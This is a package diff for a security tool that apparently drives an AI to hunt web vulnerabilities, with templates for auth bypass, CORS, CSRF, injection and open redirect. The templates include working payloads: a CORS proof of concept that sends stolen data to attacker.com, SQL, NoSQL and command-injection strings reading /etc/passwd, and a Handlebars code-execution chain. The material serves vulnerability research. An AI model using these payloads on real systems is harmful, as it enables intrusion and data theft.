tryassay 0.31.0 → 0.33.0

package/dist/hunt/state.js

@@ -0,0 +1,35 @@
+import { readFileSync, writeFileSync, mkdirSync, existsSync } from 'fs';
+import { join } from 'path';
+import { createHash } from 'crypto';
+export function getStateDir(targetPath, baseDir) {
+    const hash = createHash('sha256').update(targetPath).digest('hex').slice(0, 12);
+    const base = baseDir || join(process.cwd(), '.assay', 'hunt');
+    return join(base, hash);
+}
+export function saveState(stateDir, state) {
+    mkdirSync(stateDir, { recursive: true });
+    writeFileSync(join(stateDir, 'state.json'), JSON.stringify(state, null, 2));
+}
+export function loadState(stateDir) {
+    const path = join(stateDir, 'state.json');
+    if (!existsSync(path))
+        return null;
+    try {
+        return JSON.parse(readFileSync(path, 'utf-8'));
+    }
+    catch {
+        return null;
+    }
+}
+export function checkStaleness(state, currentHashes) {
+    const staleFiles = [];
+    for (const h of state.hypotheses) {
+        const savedHash = state.fileHashes[h.file];
+        const currentHash = currentHashes[h.file];
+        if (savedHash && currentHash && savedHash !== currentHash) {
+            staleFiles.push(h.file);
+        }
+    }
+    return [...new Set(staleFiles)];
+}
+//# sourceMappingURL=state.js.map

package/dist/hunt/state.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"state.js","sourceRoot":"","sources":["../../src/hunt/state.ts"],"names":[],"mappings":"AAAA,OAAO,EAAE,YAAY,EAAE,aAAa,EAAE,SAAS,EAAE,UAAU,EAAE,MAAM,IAAI,CAAC;AACxE,OAAO,EAAE,IAAI,EAAE,MAAM,MAAM,CAAC;AAC5B,OAAO,EAAE,UAAU,EAAE,MAAM,QAAQ,CAAC;AAGpC,MAAM,UAAU,WAAW,CAAC,UAAkB,EAAE,OAAgB;IAC9D,MAAM,IAAI,GAAG,UAAU,CAAC,QAAQ,CAAC,CAAC,MAAM,CAAC,UAAU,CAAC,CAAC,MAAM,CAAC,KAAK,CAAC,CAAC,KAAK,CAAC,CAAC,EAAE,EAAE,CAAC,CAAC;IAChF,MAAM,IAAI,GAAG,OAAO,IAAI,IAAI,CAAC,OAAO,CAAC,GAAG,EAAE,EAAE,QAAQ,EAAE,MAAM,CAAC,CAAC;IAC9D,OAAO,IAAI,CAAC,IAAI,EAAE,IAAI,CAAC,CAAC;AAC1B,CAAC;AAED,MAAM,UAAU,SAAS,CAAC,QAAgB,EAAE,KAAgB;IAC1D,SAAS,CAAC,QAAQ,EAAE,EAAE,SAAS,EAAE,IAAI,EAAE,CAAC,CAAC;IACzC,aAAa,CAAC,IAAI,CAAC,QAAQ,EAAE,YAAY,CAAC,EAAE,IAAI,CAAC,SAAS,CAAC,KAAK,EAAE,IAAI,EAAE,CAAC,CAAC,CAAC,CAAC;AAC9E,CAAC;AAED,MAAM,UAAU,SAAS,CAAC,QAAgB;IACxC,MAAM,IAAI,GAAG,IAAI,CAAC,QAAQ,EAAE,YAAY,CAAC,CAAC;IAC1C,IAAI,CAAC,UAAU,CAAC,IAAI,CAAC;QAAE,OAAO,IAAI,CAAC;IACnC,IAAI,CAAC;QACH,OAAO,IAAI,CAAC,KAAK,CAAC,YAAY,CAAC,IAAI,EAAE,OAAO,CAAC,CAAC,CAAC;IACjD,CAAC;IAAC,MAAM,CAAC;QACP,OAAO,IAAI,CAAC;IACd,CAAC;AACH,CAAC;AAED,MAAM,UAAU,cAAc,CAC5B,KAAgB,EAChB,aAAqC;IAErC,MAAM,UAAU,GAAa,EAAE,CAAC;IAChC,KAAK,MAAM,CAAC,IAAI,KAAK,CAAC,UAAU,EAAE,CAAC;QACjC,MAAM,SAAS,GAAG,KAAK,CAAC,UAAU,CAAC,CAAC,CAAC,IAAI,CAAC,CAAC;QAC3C,MAAM,WAAW,GAAG,aAAa,CAAC,CAAC,CAAC,IAAI,CAAC,CAAC;QAC1C,IAAI,SAAS,IAAI,WAAW,IAAI,SAAS,KAAK,WAAW,EAAE,CAAC;YAC1D,UAAU,CAAC,IAAI,CAAC,CAAC,CAAC,IAAI,CAAC,CAAC;QAC1B,CAAC;IACH,CAAC;IACD,OAAO,CAAC,GAAG,IAAI,GAAG,CAAC,UAAU,CAAC,CAAC,CAAC;AAClC,CAAC"}

package/dist/hunt/templates/auth-bypass.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const authBypass: VulnerabilityTemplate;

package/dist/hunt/templates/auth-bypass.js

@@ -0,0 +1,80 @@
+export const authBypass = {
+    id: 'auth-bypass',
+    name: 'Authentication Bypass',
+    cwe: 'CWE-287',
+    filePatterns: ['auth', 'login', 'session', 'middleware', 'guard', 'protect', 'jwt', 'bearer'],
+    triagePrompt: `You are a security researcher hunting for authentication bypass vulnerabilities.
+
+Analyze the code for flaws that allow requests to bypass authentication or authorization checks. Focus on:
+1. Middleware ordering — is the auth middleware applied BEFORE route handlers, or only on some routes?
+2. Route coverage — are all sensitive routes protected, or are some accidentally excluded?
+3. JWT algorithm confusion — does the verifier explicitly reject 'alg: none'? Does it accept HS256 when RS256 is expected?
+4. JWT secret strength — is the HMAC secret weak, hardcoded, or derived from a predictable value?
+5. Role checks timing — is authorization checked before or after sensitive data is fetched/returned?
+6. Session fixation — can an attacker force a session ID before authentication, then reuse it after?
+
+KNOWN BYPASS TECHNIQUES:
+- alg:none attack: modify JWT header to {"alg":"none"}, strip signature, server accepts as valid
+- RS256→HS256 confusion: server uses public key as HMAC secret when verifier accepts both; attacker signs with public key via HS256
+- JWT kid injection: if kid header is used to look up a key via DB/file, inject SQL/path traversal
+- Expired token acceptance: does the server check exp claim? Is clock skew too generous?
+- Missing auth on wildcard routes: /api/admin/* protected but /api/admin/export not in the list
+- Parallel request race: check-then-act window where two threads both pass the check simultaneously
+
+AUTH FRAMEWORK PITFALLS:
+- Express: app.use(auth) after app.use('/route', handler) means handler runs without auth
+- Next.js middleware: matchers with negative lookahead may have edge cases
+- Koa: ctx.state.user set but not checked in downstream middleware that fetches data
+
+RELEVANT SPECIFICATIONS:
+- RFC 7519 Section 7.2: JWT validation steps (algorithm, signature, exp, nbf, iss, aud)
+- RFC 7518 Section 3.6: Unsecured JWTs — 'none' algorithm MUST be explicitly rejected in security contexts`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for an authentication bypass vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+Build a complete attack scenario:
+1. Which route or endpoint is accessible without authentication?
+2. What data or action does it expose?
+3. What request does the attacker send? (Include headers, method, body)
+4. Provide a concrete curl command as proof-of-concept.
+5. What is the worst-case impact? (Data exfiltration, privilege escalation, account takeover?)
+
+JWT-SPECIFIC ATTACK PROCEDURES:
+- alg:none: base64url-decode header, change alg to "none", re-encode, use payload.header..  (empty signature)
+- RS256→HS256: grab public key from JWKS endpoint (/jwks.json or /.well-known/jwks.json), sign JWT with it as HMAC-SHA256 secret, set alg:HS256
+- Weak secret brute-force: extract JWT, run hashcat mode 16500 against common wordlists
+- kid SQL injection: if kid is used in SELECT key FROM keys WHERE id = <kid>, try kid = ' OR '1'='1
+
+ROLE ESCALATION AFTER AUTH BYPASS:
+- Check if user object in JWT or session contains a role field that can be manipulated
+- Look for privilege checks that compare string roles without canonicalization ('Admin' vs 'admin')
+- Horizontal privilege escalation: auth passes but resource ownership is not verified
+
+EVIDENCE TO INCLUDE:
+- The exact JWT or request that bypasses the check
+- Server response confirming access to protected resource
+- The specific code lines where the check is missing or bypassable
+
+RELEVANT SPECIFICATIONS:
+- RFC 7519 Section 7.2: Mandatory JWT validation algorithm — must reject unsupported alg values
+- RFC 7519 Section 4.1.4: exp (Expiration Time) claim validation`,
+    knownBypasses: [
+        'JWT alg:none — strip signature, set algorithm to none',
+        'RS256→HS256 confusion — sign with public key as HMAC secret',
+        'JWT kid header SQL/path injection',
+        'Missing auth middleware on specific routes (wildcard gap)',
+        'Role check after data fetch (authorization logic inversion)',
+        'Session fixation — force session ID before login',
+        'Expired JWT acceptance (missing exp validation)',
+        'Weak HMAC secret (brute-forceable with hashcat)',
+    ],
+    specReferences: [
+        'RFC 7519 (JSON Web Token)',
+        'RFC 7519 Section 7.2 (JWT Validation)',
+        'RFC 7518 Section 3.6 (Unsecured JWTs)',
+        'OWASP Authentication Cheat Sheet',
+    ],
+    severityRange: ['high', 'critical'],
+};
+//# sourceMappingURL=auth-bypass.js.map

package/dist/hunt/templates/auth-bypass.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"auth-bypass.js","sourceRoot":"","sources":["../../../src/hunt/templates/auth-bypass.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,UAAU,GAA0B;IAC/C,EAAE,EAAE,aAAa;IACjB,IAAI,EAAE,uBAAuB;IAC7B,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,MAAM,EAAE,OAAO,EAAE,SAAS,EAAE,YAAY,EAAE,OAAO,EAAE,SAAS,EAAE,KAAK,EAAE,QAAQ,CAAC;IAC7F,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;2GAyB2F;IAEzG,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;iEA6B+C;IAE/D,aAAa,EAAE;QACb,uDAAuD;QACvD,6DAA6D;QAC7D,mCAAmC;QACnC,2DAA2D;QAC3D,6DAA6D;QAC7D,kDAAkD;QAClD,iDAAiD;QACjD,iDAAiD;KAClD;IACD,cAAc,EAAE;QACd,2BAA2B;QAC3B,uCAAuC;QACvC,uCAAuC;QACvC,kCAAkC;KACnC;IACD,aAAa,EAAE,CAAC,MAAM,EAAE,UAAU,CAAC;CACpC,CAAC"}

package/dist/hunt/templates/cors-misconfig.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const corsMisconfig: VulnerabilityTemplate;

package/dist/hunt/templates/cors-misconfig.js

@@ -0,0 +1,88 @@
+export const corsMisconfig = {
+    id: 'cors-misconfig',
+    name: 'CORS Misconfiguration',
+    cwe: 'CWE-942',
+    filePatterns: ['cors', 'origin', 'access-control', 'allow-origin', 'credentials'],
+    triagePrompt: `You are a security researcher hunting for CORS misconfiguration vulnerabilities.
+
+Analyze the code for flaws in Cross-Origin Resource Sharing policy configuration. Focus on:
+1. Origin reflection — does the server echo back the request's Origin header without validation?
+2. Wildcard with credentials — does the server send Access-Control-Allow-Origin: * combined with Access-Control-Allow-Credentials: true? (browsers block this, but some clients don't)
+3. Null origin acceptance — does the server allowlist the 'null' origin? (set by sandboxed iframes, data URIs, local files)
+4. Regex bypass — is the origin validated by a regex that can be tricked? (e.g., /example\.com$/ matches evilexample.com)
+5. Subdomain wildcard — does *.example.com unconditionally trust ALL subdomains including user-controlled ones?
+6. Pre-flight vs actual request mismatch — are credentials checked on preflight but not on the actual request?
+
+KNOWN BYPASS TECHNIQUES:
+- Regex suffix match: if check is origin.endsWith('example.com'), attacker registers evilexample.com
+- Null origin: <iframe sandbox="allow-scripts" srcdoc="..."> sends Origin: null — accepted if server allowlists null
+- Subdomain reflection with subdomain takeover: sub.example.com is claimable on GitHub Pages/S3 → full CORS trust
+- HTTP downgrade: HTTPS API reflects origin from HTTP version of attacker's domain
+- Origin with port: if only example.com is validated, attacker controls example.com:8080
+- Post-message relay: exploit trusted third-party that accepts all origins and relays to victim API
+
+WHAT TO LOOK FOR IN CODE:
+- req.headers.origin passed directly to res.setHeader('Access-Control-Allow-Origin', ...)
+- allowedOrigins.includes(origin) without normalization (case, trailing slash, port)
+- cors({ origin: true }) — reflects everything — in express/cors package
+- Manual regex like /https?:\/\/(.+\.)?example\.com/ — check for anchoring
+
+RELEVANT SPECIFICATIONS:
+- Fetch Standard Section 3.2: CORS protocol definition
+- Fetch Standard Section 3.2.5: Cannot combine * with credentials`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a CORS misconfiguration.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+Build a complete attack scenario:
+1. What origin does the attacker control or spoof?
+2. What does the server respond with in Access-Control-Allow-Origin and Access-Control-Allow-Credentials?
+3. What sensitive API endpoint does the attacker's page call?
+4. What data can be read cross-origin? (credentials, tokens, PII)
+5. Provide a concrete HTML/JavaScript proof-of-concept page.
+
+PROOF-OF-CONCEPT TEMPLATE:
+\`\`\`html
+<script>
+fetch('https://target.com/api/user', {
+  credentials: 'include',
+  headers: { 'Origin': 'https://attacker.com' }
+})
+.then(r => r.json())
+.then(data => {
+  // exfiltrate to attacker server
+  fetch('https://attacker.com/exfil?data=' + JSON.stringify(data));
+});
+</script>
+\`\`\`
+
+EXPLOITABILITY MATRIX:
+- Origin reflected + credentials: true → Full cross-origin authenticated reads → CRITICAL
+- Null origin accepted + credentials: true → Exploitable via sandboxed iframe → HIGH
+- Subdomain reflection + claimable subdomain → MEDIUM-HIGH (requires additional step)
+- Wildcard (*) + no credentials → Low impact (no authenticated reads possible in browser)
+
+WHAT TO VERIFY:
+- Send the request with the crafted origin and confirm the response header
+- Check if Access-Control-Allow-Credentials: true appears
+- Confirm the API returns sensitive data on authenticated requests
+- Test whether cookies are sent (check for Set-Cookie on auth endpoint)
+
+RELEVANT SPECIFICATIONS:
+- Fetch Standard Section 3.2.5: Access-Control-Allow-Origin wildcard + credentials is forbidden
+- Fetch Standard Section 3.2.3: CORS preflight and its limitations`,
+    knownBypasses: [
+        'Origin reflection — server echoes request Origin without validation',
+        'Null origin acceptance (sandboxed iframes, data URIs)',
+        'Regex suffix bypass: evilexample.com matches /example\\.com$/',
+        'Subdomain reflection with subdomain takeover',
+        'Wildcard with credentials (Access-Control-Allow-Origin: *)',
+        'Port variation: example.com:8080 if only example.com validated',
+    ],
+    specReferences: [
+        'Fetch Standard Section 3.2 (CORS protocol)',
+        'Fetch Standard Section 3.2.5 (Credentials + wildcard forbidden)',
+    ],
+    severityRange: ['medium', 'high'],
+};
+//# sourceMappingURL=cors-misconfig.js.map

package/dist/hunt/templates/cors-misconfig.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"cors-misconfig.js","sourceRoot":"","sources":["../../../src/hunt/templates/cors-misconfig.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,aAAa,GAA0B;IAClD,EAAE,EAAE,gBAAgB;IACpB,IAAI,EAAE,uBAAuB;IAC7B,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,MAAM,EAAE,QAAQ,EAAE,gBAAgB,EAAE,cAAc,EAAE,aAAa,CAAC;IACjF,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;kEA0BkD;IAEhE,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;mEAwCiD;IAEjE,aAAa,EAAE;QACb,qEAAqE;QACrE,uDAAuD;QACvD,+DAA+D;QAC/D,8CAA8C;QAC9C,4DAA4D;QAC5D,gEAAgE;KACjE;IACD,cAAc,EAAE;QACd,4CAA4C;QAC5C,iEAAiE;KAClE;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,MAAM,CAAC;CAClC,CAAC"}

package/dist/hunt/templates/csrf-bypass.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const csrfBypass: VulnerabilityTemplate;

package/dist/hunt/templates/csrf-bypass.js

@@ -0,0 +1,65 @@
+export const csrfBypass = {
+    id: 'csrf-bypass',
+    name: 'CSRF Bypass',
+    cwe: 'CWE-352',
+    filePatterns: ['csrf', 'origin', 'referer', 'same-site', 'cross-site'],
+    negativePatterns: [],
+    triagePrompt: `You are a security researcher hunting for CSRF bypass vulnerabilities.
+
+Analyze the code for flaws in cross-site request forgery protection. Focus on:
+1. Origin/Referer header validation — is it strict or bypassable?
+2. Wildcard domain matching — does *.example.com also match *.com?
+3. Token generation — is the CSRF token cryptographically random?
+4. Token validation — is comparison timing-safe? Is the token actually checked?
+5. SameSite cookie attribute — is it set correctly? Can it be bypassed?
+
+KNOWN BYPASS TECHNIQUES:
+- TLD-level wildcards: *.com matches evil.com if label count isn't checked
+- Null origin: some validators accept Origin: null (sandboxed iframes)
+- Subdomain takeover: if *.example.com is allowed and sub.example.com is claimable
+- Method override: POST protection bypassed via _method=GET parameter
+- Content-type trick: application/x-www-form-urlencoded bypasses JSON CSRF checks
+- Flash/PDF origin spoofing (legacy browsers)
+
+RELEVANT SPECIFICATIONS:
+- RFC 6454 (The Web Origin Concept): Origin header format and comparison rules
+- Fetch Standard Section 3.2: CORS-safelisted request requirements
+- SameSite cookies (RFC 6265bis): Lax vs Strict vs None semantics`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for a CSRF bypass.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+Build a complete attack scenario:
+1. What origin/request can the attacker craft?
+2. What server-side check does it bypass?
+3. What action can the attacker force the victim to perform?
+4. Provide a concrete curl command or HTML form as proof-of-concept.
+
+Be specific about WHY the bypass works — cite the exact code path and the spec violation.
+
+KNOWN BYPASS TECHNIQUES:
+- TLD-level wildcards: *.com matches evil.com if label count isn't checked
+- Null origin: some validators accept Origin: null
+- Subdomain takeover: claimable subdomains under allowed wildcards
+- Method override: _method parameter bypasses POST-only CSRF checks
+- Content-type bypass: form-urlencoded avoids JSON content-type CSRF checks
+
+RELEVANT SPECIFICATIONS:
+- RFC 6454 Section 5: Comparing Origins (scheme + host + port must all match)
+- RFC 6265bis Section 5.3.7: SameSite attribute processing`,
+    knownBypasses: [
+        'TLD-level wildcard (*.com matches evil.com)',
+        'Null origin via sandboxed iframe',
+        'Subdomain takeover under allowed wildcard',
+        'HTTP method override (_method parameter)',
+        'Content-type trick (form vs JSON)',
+        'Missing token validation on specific endpoints',
+    ],
+    specReferences: [
+        'RFC 6454 (Web Origin Concept)',
+        'RFC 6265bis (SameSite cookies)',
+        'Fetch Standard Section 3.2',
+    ],
+    severityRange: ['medium', 'critical'],
+};
+//# sourceMappingURL=csrf-bypass.js.map

package/dist/hunt/templates/csrf-bypass.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"csrf-bypass.js","sourceRoot":"","sources":["../../../src/hunt/templates/csrf-bypass.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,UAAU,GAA0B;IAC/C,EAAE,EAAE,aAAa;IACjB,IAAI,EAAE,aAAa;IACnB,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,MAAM,EAAE,QAAQ,EAAE,SAAS,EAAE,WAAW,EAAE,YAAY,CAAC;IACtE,gBAAgB,EAAE,EAAE;IACpB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;kEAoBkD;IAEhE,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;2DAqByC;IAEzD,aAAa,EAAE;QACb,6CAA6C;QAC7C,kCAAkC;QAClC,2CAA2C;QAC3C,0CAA0C;QAC1C,mCAAmC;QACnC,gDAAgD;KACjD;IACD,cAAc,EAAE;QACd,+BAA+B;QAC/B,gCAAgC;QAChC,4BAA4B;KAC7B;IACD,aAAa,EAAE,CAAC,QAAQ,EAAE,UAAU,CAAC;CACtC,CAAC"}

package/dist/hunt/templates/index.d.ts

@@ -0,0 +1,3 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare function getAllTemplates(): VulnerabilityTemplate[];
+export declare function getTemplateById(id: string): VulnerabilityTemplate | undefined;

package/dist/hunt/templates/index.js

@@ -0,0 +1,29 @@
+import { csrfBypass } from './csrf-bypass.js';
+import { ssrf } from './ssrf.js';
+import { weakRandom } from './weak-random.js';
+import { authBypass } from './auth-bypass.js';
+import { corsMisconfig } from './cors-misconfig.js';
+import { pathTraversal } from './path-traversal.js';
+import { injection } from './injection.js';
+import { openRedirect } from './open-redirect.js';
+import { prototypePollution } from './prototype-pollution.js';
+import { timingAttack } from './timing-attack.js';
+const templates = [
+    csrfBypass,
+    ssrf,
+    weakRandom,
+    authBypass,
+    corsMisconfig,
+    pathTraversal,
+    injection,
+    openRedirect,
+    prototypePollution,
+    timingAttack,
+];
+export function getAllTemplates() {
+    return templates;
+}
+export function getTemplateById(id) {
+    return templates.find(t => t.id === id);
+}
+//# sourceMappingURL=index.js.map

package/dist/hunt/templates/index.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../../../src/hunt/templates/index.ts"],"names":[],"mappings":"AACA,OAAO,EAAE,UAAU,EAAE,MAAM,kBAAkB,CAAC;AAC9C,OAAO,EAAE,IAAI,EAAE,MAAM,WAAW,CAAC;AACjC,OAAO,EAAE,UAAU,EAAE,MAAM,kBAAkB,CAAC;AAC9C,OAAO,EAAE,UAAU,EAAE,MAAM,kBAAkB,CAAC;AAC9C,OAAO,EAAE,aAAa,EAAE,MAAM,qBAAqB,CAAC;AACpD,OAAO,EAAE,aAAa,EAAE,MAAM,qBAAqB,CAAC;AACpD,OAAO,EAAE,SAAS,EAAE,MAAM,gBAAgB,CAAC;AAC3C,OAAO,EAAE,YAAY,EAAE,MAAM,oBAAoB,CAAC;AAClD,OAAO,EAAE,kBAAkB,EAAE,MAAM,0BAA0B,CAAC;AAC9D,OAAO,EAAE,YAAY,EAAE,MAAM,oBAAoB,CAAC;AAElD,MAAM,SAAS,GAA4B;IACzC,UAAU;IACV,IAAI;IACJ,UAAU;IACV,UAAU;IACV,aAAa;IACb,aAAa;IACb,SAAS;IACT,YAAY;IACZ,kBAAkB;IAClB,YAAY;CACb,CAAC;AAEF,MAAM,UAAU,eAAe;IAC7B,OAAO,SAAS,CAAC;AACnB,CAAC;AAED,MAAM,UAAU,eAAe,CAAC,EAAU;IACxC,OAAO,SAAS,CAAC,IAAI,CAAC,CAAC,CAAC,EAAE,CAAC,CAAC,CAAC,EAAE,KAAK,EAAE,CAAC,CAAC;AAC1C,CAAC"}

package/dist/hunt/templates/injection.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const injection: VulnerabilityTemplate;

package/dist/hunt/templates/injection.js

@@ -0,0 +1,103 @@
+export const injection = {
+    id: 'injection',
+    name: 'Injection (SQL, NoSQL, Command)',
+    cwe: 'CWE-89',
+    filePatterns: ['query', 'exec', 'eval', 'sql', 'mongo', 'command', 'shell', 'spawn', 'template'],
+    negativePatterns: ['prisma', 'drizzle', 'typeorm', 'sequelize', 'knex', 'mongoose'],
+    minMatchScore: 2,
+    triagePrompt: `You are a security researcher hunting for injection vulnerabilities (SQL, NoSQL, command injection).
+
+Analyze the code for places where user input is concatenated into queries, commands, or evaluated expressions without proper parameterization or sanitization. Focus on:
+1. Raw SQL string construction — is user input interpolated into SQL via template literals or concatenation?
+2. NoSQL operator injection — can user input supply MongoDB operators like $gt, $regex, $where?
+3. Command injection — is user input passed to child_process.exec(), execSync(), or spawn with shell: true?
+4. Template injection — is user input rendered via a template engine (handlebars, ejs, pug) without escaping?
+5. eval() or Function() calls — is user-controlled data passed to JavaScript's eval?
+6. Database escape bypasses — does custom sanitization miss edge cases that parameterized queries handle natively?
+
+KNOWN BYPASS TECHNIQUES:
+- String interpolation: \`SELECT * FROM users WHERE name = '\${name}'\` — classic SQL injection
+- NoSQL operator: if body is JSON, {password: {$gt: ""}} bypasses equality check in MongoDB
+- Command injection: exec('ls ' + userInput) — user provides '; cat /etc/passwd'
+- spawn shell:true: spawn('bash', ['-c', 'ls ' + userInput]) same risk as exec
+- Template injection (SSTI): {{7*7}} in Handlebars, <%= 7*7 %> in EJS — escalates to RCE
+- Second-order injection: stored value is safe at insert but injected when later used in a query
+- ORM raw queries: orm.query("SELECT * FROM t WHERE id = " + id) — ORMs still have raw query escapes
+
+WHAT TO LOOK FOR:
+- Template literal SQL: \`SELECT... WHERE id = \${req.params.id}\`
+- String concat: "SELECT..." + userValue + "..."
+- db.collection.find({ username: req.body.username }) where body is JSON (type not enforced)
+- exec(\`cmd \${userInput}\`) or execSync with user data
+- eval(userInput) anywhere
+
+FRAMEWORK-SPECIFIC RISKS:
+- MongoDB: req.body passed directly to find() — JSON body allows operator injection
+- Redis: if EVAL or raw command strings accept user data
+- Elasticsearch: query string parameters passed to _search API
+
+RELEVANT SPECIFICATIONS:
+- OWASP Injection Prevention Cheat Sheet
+- CWE-89 (SQL Injection), CWE-943 (NoSQL Injection), CWE-78 (OS Command Injection)`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for an injection vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+Build a complete attack scenario:
+1. What user-controlled value reaches the query/command without sanitization?
+2. What is the injection point (SQL, NoSQL operator, shell command, template expression)?
+3. What payload triggers the vulnerability?
+4. What data can be exfiltrated, or what command can be run on the server?
+5. Provide a concrete HTTP request or payload as proof-of-concept.
+
+SQL INJECTION EXPLOITATION LADDER:
+- Boolean-based: ' OR '1'='1 → ' OR '1'='2 → enumerate DB
+- Union-based: ' UNION SELECT username, password FROM users --
+- Error-based: ' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()))) --
+- Time-based blind: ' OR SLEEP(5) --
+- Out-of-band: ' UNION SELECT LOAD_FILE('/etc/passwd') --
+- Stacked queries (PostgreSQL/SQL Server): '; DROP TABLE users --
+
+NOSQL INJECTION PAYLOADS:
+\`\`\`json
+// Authentication bypass
+{"username": "admin", "password": {"$gt": ""}}
+// Regex extraction
+{"username": {"$regex": "^adm"}}
+// $where (if enabled)
+{"$where": "this.password.match(/.*/)"}
+\`\`\`
+
+COMMAND INJECTION PAYLOADS:
+- Basic: ; whoami
+- Subshell: $(whoami)
+- Pipe: | cat /etc/passwd
+- Background: && sleep 5 (time-based blind)
+- Newline: \\nwhoami (if input used in shell heredoc)
+
+TEMPLATE INJECTION:
+- Handlebars: {{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('id')"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
+
+RELEVANT SPECIFICATIONS:
+- OWASP Injection Prevention Cheat Sheet
+- CWE-89 (SQL Injection)
+- CWE-78 (OS Command Injection)`,
+    knownBypasses: [
+        'Template literal SQL: `SELECT WHERE id = \${userInput}`',
+        'MongoDB operator injection: {password: {$gt: ""}}',
+        'Command injection via exec() with shell interpolation',
+        'spawn() with shell: true — same risk as exec()',
+        'Template engine SSTI → RCE (Handlebars, EJS)',
+        'Second-order injection (stored then retrieved into query)',
+        'ORM raw query escape hatch',
+        'NoSQL $where clause with JavaScript execution',
+    ],
+    specReferences: [
+        'OWASP Injection Prevention Cheat Sheet',
+        'CWE-89 (SQL Injection)',
+        'CWE-943 (NoSQL Injection)',
+        'CWE-78 (OS Command Injection)',
+    ],
+    severityRange: ['high', 'critical'],
+};
+//# sourceMappingURL=injection.js.map

package/dist/hunt/templates/injection.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"injection.js","sourceRoot":"","sources":["../../../src/hunt/templates/injection.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,SAAS,GAA0B;IAC9C,EAAE,EAAE,WAAW;IACf,IAAI,EAAE,iCAAiC;IACvC,GAAG,EAAE,QAAQ;IACb,YAAY,EAAE,CAAC,OAAO,EAAE,MAAM,EAAE,MAAM,EAAE,KAAK,EAAE,OAAO,EAAE,SAAS,EAAE,OAAO,EAAE,OAAO,EAAE,UAAU,CAAC;IAChG,gBAAgB,EAAE,CAAC,QAAQ,EAAE,SAAS,EAAE,SAAS,EAAE,WAAW,EAAE,MAAM,EAAE,UAAU,CAAC;IACnF,aAAa,EAAE,CAAC;IAChB,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;mFAiCmE;IAEjF,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;gCA0Cc;IAE9B,aAAa,EAAE;QACb,yDAAyD;QACzD,mDAAmD;QACnD,uDAAuD;QACvD,gDAAgD;QAChD,8CAA8C;QAC9C,2DAA2D;QAC3D,4BAA4B;QAC5B,+CAA+C;KAChD;IACD,cAAc,EAAE;QACd,wCAAwC;QACxC,wBAAwB;QACxB,2BAA2B;QAC3B,+BAA+B;KAChC;IACD,aAAa,EAAE,CAAC,MAAM,EAAE,UAAU,CAAC;CACpC,CAAC"}

package/dist/hunt/templates/open-redirect.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const openRedirect: VulnerabilityTemplate;

package/dist/hunt/templates/open-redirect.js

@@ -0,0 +1,93 @@
+export const openRedirect = {
+    id: 'open-redirect',
+    name: 'Open Redirect',
+    cwe: 'CWE-601',
+    filePatterns: ['redirect', 'location', 'url', 'return', 'next', 'callback', 'continue', 'goto'],
+    triagePrompt: `You are a security researcher hunting for open redirect vulnerabilities.
+
+Analyze the code for places where user-controlled input is used to construct redirect destinations without adequate validation. Focus on:
+1. Direct parameter use — is a 'redirect', 'next', 'return', or 'callback' query parameter passed directly to a redirect?
+2. Host validation — does validation check only that the URL contains a trusted domain, not that the domain IS the host?
+3. Protocol filtering — are dangerous protocols (javascript:, data:, vbscript:) explicitly blocked?
+4. Relative vs absolute — does the code attempt to make URLs relative but miss protocol-relative cases?
+5. Post-auth redirects — are redirect parameters preserved through login flows and honored post-authentication?
+6. Double encoding — does the server decode the redirect target once, allowing a second decode to escape validation?
+
+KNOWN BYPASS TECHNIQUES:
+- Protocol-relative URL: //evil.com/ — browser treats as https://evil.com on HTTPS pages
+- Backslash: /\\evil.com — some browsers normalize to //evil.com, causing redirect to evil.com
+- Data URI: data:text/html,<script>location='https://evil.com'</script>
+- javascript: URI: javascript:location.href='https://evil.com'
+- Encoded characters: /%65%76%69%6c.com (hex encoding of 'evil')
